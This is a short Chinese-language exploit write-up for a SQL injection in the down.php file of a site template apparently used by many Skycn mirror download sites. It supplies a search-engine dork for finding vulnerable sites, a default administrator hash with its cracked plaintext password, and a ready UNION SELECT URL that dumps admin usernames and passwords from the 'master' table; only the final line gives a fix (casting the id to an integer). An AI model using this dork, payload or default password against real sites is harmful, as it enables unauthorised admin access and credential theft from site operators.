天空下載站是國內(nèi)著名的下載站點,提供國內(nèi)外最新免費軟件、共享軟件下載。其在全國各地鐵通、聯(lián)通、電信、信息港等都建有以php+MySql架設的下載分站,相當一部分下載分站的建站程序采用同一套建站模板,而這套建站模板存在SQL注入漏洞。
關鍵詞:inurl:down.php
漏洞文件:down.php
down.php中沒有對get變量$id做任何過濾措施,導致攻擊者可以任意使用SQL注入語句進行攻擊,通過測試發(fā)現(xiàn),多數(shù)管理員登陸口令默認密碼并未修改,默認管理員信息為1111_7363a304be1a682efaf10702fc7b97d8,解密密碼hash可知默認密碼為sky!@#cn!
注入利用:
keyword:Copyright©1998 - 2007 Skycn.com All Rights Reserved inurl:down.php
http://site.com/down.php?id=1+union+select+column_numbers+from+table_name
column_numbers:不固定,通常為50+,也有少于40,例如臨沂信息港測試為38個顯示位
table_name:管理員表段名為master,字段名為username,password
在字段2軟件標題顯示位填寫concat(username,0x5f,password)即可爆出管理員登陸口令
SQL EXP:
http://download.site.com/down.php?id=47488+and+1=2+union+select+1,concat(username,0x5f,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,
22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+master
安全提示:
解決方法:$id=(int)$_GET['id'];